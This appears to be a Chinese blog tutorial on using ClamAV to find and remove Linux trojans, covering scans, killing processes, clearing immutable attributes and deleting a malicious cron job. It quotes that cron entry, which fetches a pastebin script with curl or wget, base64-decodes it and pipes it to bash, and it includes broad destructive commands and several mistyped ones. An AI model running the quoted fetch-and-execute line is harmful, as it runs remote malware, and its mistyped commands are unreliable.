1、ClamAV介绍
ClamAV是一个在命令行下查毒软件,因为它不将杀毒作为主要功能,默认只能查出您计算机内的病毒,但是无法清除,至多删除文件。ClamAV可以工作很多的平台上,但是有少数无法支持,这就要取决您所使用的平台的流行程度了。另外它主要是来防护一些WINDOWS病毒和木马程序。另外,这是一个面向服务端的软件。
ClamAV的官方下载地址为http://www.clamav.net/download.html我直接使用wget下载源码安装文件。
相关使用参考http://wiki.ubuntu.org.cn/ClamAV
2、安装ClamAV
tar zxvf clamav-0.104.1.tar
cd clamav-0.104.1
./setup.sh
或者
sudo apt-get install clamav
3、升级病毒库:
sudo freshclam
4、clamscan.扫描病毒
这里附带一些例子
扫描所有用户的主目录就使用clamscan -r /home
扫描您计算机上的所有文件并且显示所有的文件的扫描结果,就使用clamscan -r /
扫描您计算机上的所有文件并且显示有问题的文件的扫描结果,就使用clamscan -r --bell -i /
如果不知道木马可能的位置就全盘扫吧,时间较长,可以放在晚上扫
clamscan -r --bell -i /
/lib/libudev.so: Unix.Trojan.DDoS_XOR-1 FOUND
/lib/lib3.so.1: Linux.Trojan.Agent FOUND
/usr/bin/jjhltwoxvs: Unix.Trojan.DDoS_XOR-1 FOUND
----------- SCAN SUMMARY -----------
Known viruses: 4059163
Engine version: 0.98.7
Scanned directories: 1300819
Scanned files: 13315360
Infected files: 4
Total errors: 14433
Data scanned: 401706.34 MB
Data read: 788612.48 MB (ratio 0.51:1)
Time: 52742.298 sec (879 m 2 s)
以上标红的就是发现的病毒文件。
使用file/lib/libudev.so查看可以看到,都是可执行文件。
木马清理
rm -rf/lib/libudev.so(删除木马程序)
rm -f /tmp/gates.lock进程号
解决:可以删除后立马自己创建一个并设置不允许修改。
如:
rm /etc/cron.hourly/gcc.sh
touch /etc/cron.hourly/gcc.sh
chattr +i /etc/cron.hourly/gcc.sh
注:chattr +i :设定文件不能被删除、改名、设定链接关系,同时不能写入或新增内容
若以上也不行,那么就破坏掉木马文件,木马的监控进程发现文件存在应该不会重新创建,故可以破坏掉:
杀死可疑进程:
使用top查看到有可以进程

使用clamscn进行病毒扫描
kill -9 27232杀掉进程
ps aux|grep kworker|grep -v grep|cut -c 9-15|xargs kill -9
几个命令:
"ps - ef"是linux里查看所有进程的命令。这时检索出的进程将作为下一条命令"grep mcfcm_st"的输入。
"grep mcfcm_st"的输出结果是,所有含有关键字"mcfcm_st"的进程,这是Oracle数据库中远程连接进程的共同特点。
"grep -v grep"是在列出的进程中去除含有关键字"grep"的进程。
"cut -c 9-15"是截取输入行的第9个字符到第15个字符,而这正好是进程号PID。
"xargs kill -9"中的xargs命令是用来把前面命令的输出结果(PID)作为"kill -9"命令的参数,并执行该令。
然后用clamsan -r --beli -i /usr/bin/kworker --remove将病毒清理掉
如果tmp文件下文件没有用的话
rm -rf /tmp/*删除掉所有文件
但是执行的过程中发现一些文件不能被删除,提示没有权限,什么???

仔细分析发先了问题之所在,原来文件自带i属性,难怪删不了。
用lsattr命令,问题就有了答案。
秘密终于暴露了,在lsattr命令下,t文件带有一个"i"的属性,所以才不可以删除,这个属性专门用来保护重要的文件不被删除,通常的情况下,懂得用这几个命令的
i:这个i可就很厉害了。它可以让一个文件“不能被删除、改名,设置连接也无法写入或添加据。”对于系统安全性有相当大的
帮助。只有root能设置此属性。
通常系统管理员有能力判断这个文件是否可以被删除。
详细参考:https://blog.csdn.net/JJuStudent/article/details/72805676
于是执行chattr -i thisxxs去掉i属性,之后就可完美删除掉。


清除定时任务
病毒进程会过一段时间重新启动,于是想到有定时任务,执行crontab -l发现果然有定时任务如下:
定时任务内容如下:
* /23 * * * *(curl -fsSL https://pastebin.com/raw/Gw7mywhC||wget-q-O- https://pastebin.com/raw/Gw7mywhC)|base64 -d|/bin/bash
在执行crontab -r或者crontab -e删除和修改定时任务时,发现和上面一样,有i属性,不能操作。去掉i属性后即可删除掉定时任务。

定时任务被删除干净: